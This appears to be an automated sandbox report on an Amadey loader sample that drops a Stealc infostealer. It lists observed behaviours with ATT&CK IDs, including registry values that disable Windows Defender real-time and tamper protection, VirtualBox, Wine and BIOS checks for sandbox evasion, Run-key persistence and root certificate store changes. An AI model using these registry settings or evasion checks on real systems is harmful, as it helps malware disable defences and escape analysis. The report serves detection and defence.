amadey | f30429f1257341aa2012149406181c128ebc53b3fcce11a482ea6266e5a00664

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	8f8bb19d95.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	8f8bb19d95.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	8f8bb19d95.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	8f8bb19d95.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	8f8bb19d95.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	8f8bb19d95.exe

Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc

Enumerates VirtualBox registry keys 2 TTPs 1 IoCs

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF	296ffac9f0.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	f50b4ce47b.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	296ffac9f0.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	9e5af0f2e5.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	aeabcf6669.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	8f8bb19d95.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rhnew.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	f30429f1257341aa2012149406181c128ebc53b3fcce11a482ea6266e5a00664.exe

Downloads MZ/PE file

Checks BIOS information in registry 2 TTPs 16 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	296ffac9f0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rhnew.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	f30429f1257341aa2012149406181c128ebc53b3fcce11a482ea6266e5a00664.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	8f8bb19d95.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rhnew.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	9e5af0f2e5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	aeabcf6669.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	aeabcf6669.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	8f8bb19d95.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	f30429f1257341aa2012149406181c128ebc53b3fcce11a482ea6266e5a00664.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	296ffac9f0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	f50b4ce47b.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	f50b4ce47b.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	9e5af0f2e5.exe

Executes dropped EXE 12 IoCs

pid	Process
2460	skotes.exe
1776	stories.exe
2492	stories.tmp
2508	videojet3264.exe
1712	GI59vO6.exe
2320	f50b4ce47b.exe
1908	296ffac9f0.exe
2416	9e5af0f2e5.exe
1220	aeabcf6669.exe
2600	219824b5d6.exe
3368	8f8bb19d95.exe
3852	rhnew.exe

Identifies Wine through registry keys 2 TTPs 8 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Wine	aeabcf6669.exe
Key opened	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Wine	8f8bb19d95.exe
Key opened	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Wine	rhnew.exe
Key opened	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Wine	f30429f1257341aa2012149406181c128ebc53b3fcce11a482ea6266e5a00664.exe
Key opened	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Wine	f50b4ce47b.exe
Key opened	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Wine	296ffac9f0.exe
Key opened	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Wine	9e5af0f2e5.exe

Loads dropped DLL 19 IoCs

pid	Process
1596	f30429f1257341aa2012149406181c128ebc53b3fcce11a482ea6266e5a00664.exe
2460	skotes.exe
1776	stories.exe
2492	stories.tmp
2492	stories.tmp
2492	stories.tmp
2492	stories.tmp
2508	videojet3264.exe
2460	skotes.exe
2460	skotes.exe
2460	skotes.exe
2460	skotes.exe
2460	skotes.exe
2460	skotes.exe
2460	skotes.exe
2460	skotes.exe
2460	skotes.exe
2460	skotes.exe
2460	skotes.exe

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	8f8bb19d95.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features	8f8bb19d95.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows\CurrentVersion\Run\9e5af0f2e5.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1011868001\\9e5af0f2e5.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows\CurrentVersion\Run\aeabcf6669.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1011869001\\aeabcf6669.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows\CurrentVersion\Run\219824b5d6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1011870001\\219824b5d6.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows\CurrentVersion\Run\8f8bb19d95.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1011871001\\8f8bb19d95.exe"	skotes.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x000800000001a071-309.dat	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs

pid	Process
1596	f30429f1257341aa2012149406181c128ebc53b3fcce11a482ea6266e5a00664.exe
2460	skotes.exe
2320	f50b4ce47b.exe
1908	296ffac9f0.exe
2416	9e5af0f2e5.exe
1220	aeabcf6669.exe
3368	8f8bb19d95.exe
3852	rhnew.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\skotes.job	f30429f1257341aa2012149406181c128ebc53b3fcce11a482ea6266e5a00664.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 25 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	videojet3264.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	GI59vO6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	8f8bb19d95.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language	219824b5d6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f50b4ce47b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aeabcf6669.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f30429f1257341aa2012149406181c128ebc53b3fcce11a482ea6266e5a00664.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	skotes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	stories.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	stories.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	296ffac9f0.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	219824b5d6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9e5af0f2e5.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage	219824b5d6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rhnew.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel	firefox.exe

Kills process with taskkill 5 IoCs

pid	Process
2040	taskkill.exe
1624	taskkill.exe
2128	taskkill.exe
1248	taskkill.exe
2428	taskkill.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000_Classes\Local Settings	firefox.exe

Modifies system certificate store 2 TTPs 10 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	skotes.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	9e5af0f2e5.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	videojet3264.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	GI59vO6.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	GI59vO6.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	videojet3264.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	videojet3264.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	skotes.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	9e5af0f2e5.exe
